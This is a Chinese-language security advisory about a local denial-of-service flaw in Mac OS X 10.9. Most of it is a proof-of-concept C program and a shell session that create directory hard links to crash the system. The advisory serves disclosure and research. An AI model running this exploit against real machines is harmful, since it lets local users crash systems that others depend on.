OS X（前称Mac OS X）是苹果公司为麦金塔电脑开发的专属操作系统的最新版本。

 

Apple Mac OS X 10.9存在本地拒绝服务漏洞，本地未授权用户可利用此漏洞使受影响系统崩溃。

 

BUGTRAQ-ID:63612

受影响系统：

Apple Mac OS X 10.9

 

测试方法：

警  告以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！mac-cxs-XK:pochd XK$ cat test.c

#include <stdio.h>

#include <unistd.h>

 

void usage(const char* program)

{

const char* message = " [src_dir] [target_dir]";

fprintf(stderr, "%s%s\\n", program, message);

}

 

int main(int argc, char* argv[]) {

if (argc!=3) {

usage(argv[0]);

return 1;

}

 

int ret = link(argv[1],argv[2]);

 

fprintf(stderr,"link(3) return= %d\\n", ret);

 

return ret;

}

 

mac-cxs-XK:pochd XK$ gcc -o test test.c

mac-cxs-XK:pochd XK$ ls

test test.c

mac-cxs-XK:pochd XK$ mkdir DIR1

mac-cxs-XK:pochd XK$ ./test DIR1 Hardlink1

link(3) return= -1

mac-cxs-XK:pochd XK$ mkdir DIR1/DIR2

mac-cxs-XK:pochd XK$ ./test DIR1/DIR2 Hardlink2

link(3) return= 0

mac-cxs-XK:pochd XK$ cd DIR1

mac-cxs-XK:DIR1 XK$ mkdir DIR2/DIR3

mac-cxs-XK:DIR1 XK$ ../test DIR2/DIR3 Hardlink3

link(3) return= 0

mac-cxs-XK:DIR1 XK$ cd DIR2

mac-cxs-XK:DIR2 XK$ mkdir DIR3/DIR4

mac-cxs-XK:DIR2 XK$ ../../test DIR3/DIR4 Hardlink4

link(3) return= -1

解决办法：

厂商补丁：

 

Apple

-----

目前厂商还没有提供补丁或者升级程序，我们建议使用此软件的用户随时关注厂商的主页以获取最新版本：

 

http://www.apple.com/support/downloads/